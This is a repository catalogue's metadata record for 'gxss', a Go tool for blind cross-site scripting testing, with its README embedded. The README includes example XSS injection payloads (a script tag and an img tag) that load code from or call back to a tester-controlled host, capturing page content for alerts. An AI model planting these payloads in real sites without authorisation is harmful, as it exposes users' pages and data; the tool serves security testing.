{"id":13762808,"url":"https://github.com/rverton/gxss","last_synced_at":"2026-03-09T16:15:45.769Z","repository":{"id":57543016,"uuid":"200214311","full_name":"rverton/gxss","owner":"rverton","description":"Blind XSS service alerting over slack or email","archived":false,"fork":false,"pushed_at":"2019-08-06T08:36:48.000Z","size":242,"stargazers_count":29,"open_issues_count":0,"forks_count":7,"subscribers_count":2,"default_branch":"master","last_synced_at":"2025-12-17T15:36:26.221Z","etag":null,"topics":["blind-xss","exfiltration","pentesting","security","xss"],"latest_commit_sha":null,"homepage":null,"language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/rverton.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-08-02T10:17:36.000Z","updated_at":"2025-12-14T19:55:30.000Z","dependencies_parsed_at":"2022-09-26T18:31:26.619Z","dependency_job_id":null,"html_url":"https://github.com/rverton/gxss","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"purl":"pkg:github/rverton/gxss","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rverton%2Fgxss","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rverton%2Fgxss/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rverton%2Fgxss/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rverton%2Fgxss/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/rverton","download_url":"https://codeload.github.com/rverton/gxss/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/rverton%2Fgxss/sbom","scorecard":null,"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30301941,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-09T14:33:48.460Z","status":"ssl_error","status_checked_at":"2026-03-09T14:33:48.027Z","response_time":61,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["blind-xss","exfiltration","pentesting","security","xss"],"created_at":"2024-08-03T14:00:57.845Z","updated_at":"2026-03-09T16:15:45.739Z","avatar_url":"https://github.com/rverton.png","language":"Go","funding_links":[],"categories":["Weapons"],"sub_categories":["Tools"],"readme":"## Blind XSS as a service\n\n**gxss** is a simple tool which serves a javascript payload and allows to identify blind XSS vulnerabilities. This is similar to [xsshunter](https://github.com/mandatoryprogrammer/xsshunter), but a bit simpler to configure and run. Alerts can be sent via Slack or email. Emails will also have a screenshot of the DOM attached (which is not possible over the Slack webhook API).\n\n![gxss](misc/mail.png)\n\n*Note: The javascript payload was taken (and slightly modified) from [xsshunter](https://github.com/mandatoryprogrammer/xsshunter)*\n\n### Installation\n\n```\ngo get -u github.com/rverton/gxss\n```\n\n### Configuration\n\nCreate a file called `.env` or set up your environment to export the following data:\n```\nPORT=8080\nMAIL_SERVER=mail.example.com:25\nMAIL_USER=user\nMAIL_PASS=pass\nMAIL_TO=hello@robinverton.de\nMAIL_FROM=gxss@robinverton.de\nSLACK_WEBHOOK=https://hooks.slack.com/XYZ\nSERVE_URL=localhost:8080\n```\n\nThe `SERVE_URL` is the public accessible URL of your server.\n\nYou can leave the `MAIL_*` or the `SLACK_WEBHOOK` setting blank if you do not want to use it. Find more about how to setup Slack webhooks [here](https://api.slack.com/incoming-webhooks).\n\n### Usage\n\n```\n$ gxss\n```\n\nYou can now use a payload like the following which will load and execute the javascript payload:\n\n```html\n\u003cscript src=//yourserver.com\u003e\u003c/script\u003e\n```\n\ngxss can also be used as a request bin. Every request matching `//yourserver.com/k{key}` will be alerted to you. Example:\n\n```html\n\u003cimg src=//yourserver.com/kTARGET1\u003e\n```\n\n### Alternatives\n\n* [xsshunter](https://github.com/mandatoryprogrammer/xsshunter), python, most features, alerts require Mailgun account and wildcard certificate\n* [xless](https://github.com/mazen160/xless), node.js, serverless on [zeit.co](https://zeit.co), alerts over Slack\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frverton%2Fgxss","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Frverton%2Fgxss","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Frverton%2Fgxss/lists"}